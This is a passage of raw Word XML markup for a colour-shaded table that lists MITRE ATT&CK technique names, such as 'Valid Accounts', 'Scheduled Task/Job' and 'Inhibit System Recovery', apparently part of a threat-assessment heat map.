              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Scheduled Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19BE5C9C" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Financial Theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E4115A" w:rsidRPr="001019D3" w14:paraId="7DFCB22A" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="370C3D87" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Search Open Websites/Domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BA13FAE" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2414D5AC" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Trusted Relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E55EAD8" w14:textId="5C34D39E" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Native API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="511F459F" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Event Triggered Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37BEC6D8" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Event Triggered Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CDF1D65" w14:textId="3179563D" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Direct Volume Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="067765C4" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Multi-Factor Authentication Interception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D87BAEA" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Debugger Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B1A6B03" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Use Alternate Authentication Material</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F884148" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data from Information Repositories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="393D5647" w14:textId="2614067E" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Hide Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0123A396" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Transfer Data to Cloud Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F475109" w14:textId="77777777" w:rsidR="00E4115A" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00E4115A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t xml:space="preserve">Firmware </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
              </w:rPr>
              <w:t>Corruption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="3A0F1C12" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="624BF023" w14:textId="2F778DBB" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Search Threat Vendor Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16486AB9" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73330648" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0784F883" w14:textId="165252AE" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Poisoned Pipeline Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="133E72EA" w14:textId="3720AABE" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exclusive Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DCB2CC2" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exploitation for Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5680FFB1" w14:textId="33815C6A" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Domain or Tenant Policy Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DDE14C0" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Multi-Factor Authentication Request Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BCECF5C" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Device Driver Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07F5CC73" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BB10AF3" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data from Local System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51FE0ECD" w14:textId="41881E12" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A8AB880" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56D4BACD" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Inhibit System Recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="0F84D6DD" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70B4B0F5" w14:textId="6A7E0CFC" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Search Victim-Owned Websites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EF59FB6" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FFCFAF0" w14:textId="5A63DA62" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Wi-Fi Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7733794A" w14:textId="38687CAF" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Scheduled Task/Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CC0FD41" w14:textId="7B43007B" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
